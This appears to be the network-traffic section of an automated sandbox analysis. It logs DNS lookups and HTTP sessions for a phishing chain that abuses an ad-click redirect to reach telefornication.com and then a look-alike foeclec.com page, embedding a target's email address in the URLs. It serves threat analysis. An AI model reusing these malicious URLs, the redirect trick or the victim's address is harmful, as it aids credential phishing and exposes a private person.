                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      May 8, 2024 20:12:30.226372004 CEST1.1.1.1192.168.2.160x8b33No error (0)telefornication.com66.29.134.201A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:31.260294914 CEST1.1.1.1192.168.2.160xc94cNo error (0)0n18pyx-clickadservices-rebooot0fa.foeclec.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:31.284400940 CEST1.1.1.1192.168.2.160x89eeNo error (0)0n18pyx-clickadservices-rebooot0fa.foeclec.com104.21.15.140A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:31.284400940 CEST1.1.1.1192.168.2.160x89eeNo error (0)0n18pyx-clickadservices-rebooot0fa.foeclec.com172.67.162.187A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:32.559571028 CEST1.1.1.1192.168.2.160xc403No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:32.559571028 CEST1.1.1.1192.168.2.160xc403No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:32.559571028 CEST1.1.1.1192.168.2.160xc403No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:32.559571028 CEST1.1.1.1192.168.2.160xc403No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:32.561207056 CEST1.1.1.1192.168.2.160xf98fNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:32.561207056 CEST1.1.1.1192.168.2.160xf98fNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:32.561507940 CEST1.1.1.1192.168.2.160x48dfNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:34.088438988 CEST1.1.1.1192.168.2.160x4d40No error (0)www.google.com172.217.14.228A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:34.088557005 CEST1.1.1.1192.168.2.160x9898No error (0)www.google.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:34.171267986 CEST1.1.1.1192.168.2.160xdb7bNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:34.171267986 CEST1.1.1.1192.168.2.160xdb7bNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:34.172333002 CEST1.1.1.1192.168.2.160xe1e6No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:35.925746918 CEST1.1.1.1192.168.2.160x2155No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:35.925746918 CEST1.1.1.1192.168.2.160x2155No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:35.925767899 CEST1.1.1.1192.168.2.160xe1efNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:36.529850960 CEST1.1.1.1192.168.2.160x6f68No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:44.311836958 CEST1.1.1.1192.168.2.160x3f01No error (0)0n18pyx-clickadservices-rebooot0fa.foeclec.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:44.378726006 CEST1.1.1.1192.168.2.160x6a06No error (0)0n18pyx-clickadservices-rebooot0fa.foeclec.com104.21.15.140A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:44.378726006 CEST1.1.1.1192.168.2.160x6a06No error (0)0n18pyx-clickadservices-rebooot0fa.foeclec.com172.67.162.187A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:47.937278986 CEST1.1.1.1192.168.2.160xf218No error (0)www.google.com142.250.69.196A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:47.937618017 CEST1.1.1.1192.168.2.160x535fNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:47.937772036 CEST1.1.1.1192.168.2.160x25caNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:47.946589947 CEST1.1.1.1192.168.2.160x94a8No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:47.946589947 CEST1.1.1.1192.168.2.160x94a8No error (0)d2vgu95hoyrpkh.cloudfront.net99.86.38.103A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:47.946589947 CEST1.1.1.1192.168.2.160x94a8No error (0)d2vgu95hoyrpkh.cloudfront.net99.86.38.74A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:47.946589947 CEST1.1.1.1192.168.2.160x94a8No error (0)d2vgu95hoyrpkh.cloudfront.net99.86.38.77A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:47.946589947 CEST1.1.1.1192.168.2.160x94a8No error (0)d2vgu95hoyrpkh.cloudfront.net99.86.38.118A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:10.547247887 CEST1.1.1.1192.168.2.160x8eb1No error (0)httpbin.org54.160.164.209A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:10.547247887 CEST1.1.1.1192.168.2.160x8eb1No error (0)httpbin.org3.231.248.100A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:10.547247887 CEST1.1.1.1192.168.2.160x8eb1No error (0)httpbin.org3.233.6.75A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:10.547247887 CEST1.1.1.1192.168.2.160x8eb1No error (0)httpbin.org54.87.148.249A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:11.686945915 CEST1.1.1.1192.168.2.160x6e87No error (0)ipapi.co172.67.69.226A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:11.686945915 CEST1.1.1.1192.168.2.160x6e87No error (0)ipapi.co104.26.9.44A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:11.686945915 CEST1.1.1.1192.168.2.160x6e87No error (0)ipapi.co104.26.8.44A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:11.687704086 CEST1.1.1.1192.168.2.160x4381No error (0)ipapi.co65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:11.688189983 CEST1.1.1.1192.168.2.160x4abfNo error (0)httpbin.org3.231.248.100A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:11.688189983 CEST1.1.1.1192.168.2.160x4abfNo error (0)httpbin.org3.233.6.75A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:11.688189983 CEST1.1.1.1192.168.2.160x4abfNo error (0)httpbin.org54.87.148.249A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:11.688189983 CEST1.1.1.1192.168.2.160x4abfNo error (0)httpbin.org54.160.164.209A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:12.569870949 CEST1.1.1.1192.168.2.160x5d80No error (0)ipapi.co65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:12.569892883 CEST1.1.1.1192.168.2.160xb00bNo error (0)ipapi.co104.26.9.44A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:12.569892883 CEST1.1.1.1192.168.2.160xb00bNo error (0)ipapi.co104.26.8.44A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:12.569892883 CEST1.1.1.1192.168.2.160xb00bNo error (0)ipapi.co172.67.69.226A (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:36.530011892 CEST1.1.1.1192.168.2.160xbad0No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                      • fs.microsoft.com
                                                                                                                                      • slscr.update.microsoft.com
                                                                                                                                      • armmf.adobe.com
                                                                                                                                      • ad.doubleclick.net
                                                                                                                                      • telefornication.com
                                                                                                                                      • https:
                                                                                                                                        • 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                        • code.jquery.com
                                                                                                                                        • challenges.cloudflare.com
                                                                                                                                        • www.google.com
                                                                                                                                        • cdn.socket.io
                                                                                                                                        • httpbin.org
                                                                                                                                        • ipapi.co
                                                                                                                                      • a.nel.cloudflare.com
                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.1649711104.125.88.106443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:04 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: identity
                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                      2024-05-08 18:12:05 UTC466INHTTP/1.1 200 OK
                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                      Server: ECAcc (sac/2518)
                                                                                                                                      X-CID: 11
                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                      X-Ms-Region: prod-eus-z1
                                                                                                                                      Cache-Control: public, max-age=46337
                                                                                                                                      Date: Wed, 08 May 2024 18:12:05 GMT
                                                                                                                                      Connection: close
                                                                                                                                      X-CID: 2


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.1649712104.125.88.106443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:05 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: identity
                                                                                                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                      Range: bytes=0-2147483646
                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                      2024-05-08 18:12:05 UTC538INHTTP/1.1 200 OK
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                      ApiVersion: Distribute 1.1
                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                      X-Azure-Ref: 0MNkrYwAAAADiUL7L3dxqSIABzBrl++yWQ082QUEzMTUwODEwMDIxAGNlZmMyNTgzLWE5YjItNDRhNy05NzU1LWI3NmQxN2UwNWY3Zg==
                                                                                                                                      Cache-Control: public, max-age=29701
                                                                                                                                      Date: Wed, 08 May 2024 18:12:05 GMT
                                                                                                                                      Content-Length: 55
                                                                                                                                      Connection: close
                                                                                                                                      X-CID: 2
                                                                                                                                      2024-05-08 18:12:05 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.164971340.127.169.103443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:08 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=tr4Mf1t3WFAGUHw&MD=GGGn5gAy HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                      2024-05-08 18:12:09 UTC560INHTTP/1.1 200 OK
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Expires: -1
                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                      MS-CorrelationId: 2312d9f0-3719-4ef9-a01f-8ec345b09392
                                                                                                                                      MS-RequestId: ca510086-3e75-4394-bed3-2e1e37e40784
                                                                                                                                      MS-CV: UraojRX8iE6a9or4.0
                                                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Date: Wed, 08 May 2024 18:12:08 GMT
                                                                                                                                      Connection: close
                                                                                                                                      Content-Length: 24490
                                                                                                                                      2024-05-08 18:12:09 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                      2024-05-08 18:12:09 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.1649714173.222.196.1434431364C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:26 UTC390OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                                                                                                      Host: armmf.adobe.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      2024-05-08 18:12:26 UTC247INHTTP/1.1 200 OK
                                                                                                                                      Server: Apache
                                                                                                                                      Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                                                                                                      ETag: "78-5faa31cce96da"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Content-Length: 120
                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                      Date: Wed, 08 May 2024 18:12:26 GMT
                                                                                                                                      Connection: close
                                                                                                                                      2024-05-08 18:12:26 UTC120INData Raw: 46 69 6c 65 20 74 68 61 74 20 61 63 74 73 20 6c 69 6b 65 20 61 20 4b 69 6c 6c 20 73 77 69 74 63 68 20 66 6f 72 20 53 4d 53 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 69 6e 20 52 65 61 64 65 72 2e 20 44 65 6c 65 74 65 20 74 68 69 73 20 66 69 6c 65 20 74 6f 20 65 6e 61 62 6c 65 20 74 68 65 20 6b 69 6c 6c 20 73 77 69 74 63 68 20 69 6e 20 52 65 61 64 65 72 2e
                                                                                                                                      Data Ascii: File that acts like a Kill switch for SMS functionality in Reader. Delete this file to enable the kill switch in Reader.


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.1649716142.251.33.704435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:29 UTC959OUTGET /clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//telefornication.com/css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.edu HTTP/1.1
                                                                                                                                      Host: ad.doubleclick.net
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:29 UTC985INHTTP/1.1 302 Found
                                                                                                                                      P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                      Location: //telefornication.com/css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.edu
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Date: Wed, 08 May 2024 18:12:29 GMT
                                                                                                                                      Server: cafe
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      Set-Cookie: IDE=AHWqTUnsmjy6zUsWL2fqRXjUWbNBBRMt-qE8C5jqkWKsAitNsm2xEJSu_ZG5GJIYl4g; expires=Mon, 02-Jun-2025 18:12:29 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                      Set-Cookie: FLC=COeSAhDD6KgrGIDauX4omdVHMI2B77EGcADauAQaMhg6FgoUKDCYF739wTqaGwYIjYHvsQagGwE; expires=Wed, 08-May-2024 18:12:39 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.164972066.29.134.2014435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:30 UTC739OUTGET /css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.edu HTTP/1.1
                                                                                                                                      Host: telefornication.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:31 UTC268INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 08 May 2024 18:12:30 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Content-Length: 0
                                                                                                                                      Connection: close
                                                                                                                                      refresh: 0;url=https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/#Hmmclaughlin@scs.edu
                                                                                                                                      Vary: User-Agent


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.164972166.29.134.2014435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:31 UTC671OUTGET /favicon.ico HTTP/1.1
                                                                                                                                      Host: telefornication.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://telefornication.com/css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.edu
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:31 UTC186INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 08 May 2024 18:12:31 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Content-Length: 315
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      2024-05-08 18:12:31 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.1649724104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:31 UTC722OUTGET /7FF88B1/ HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Referer: https://telefornication.com/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:32 UTC1001INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:32 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y04CU9b9Ux8C2%2FBQPDQnpIyvDHEM3IRkr8vsvB2mQ33XNTreUF8ztSjSHkqRElJYWQQepXBvKXcTW1tuqZOnCs9YwxI0qopmBOAhNwq0eOhYscLbBDlwqc0odqpFjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
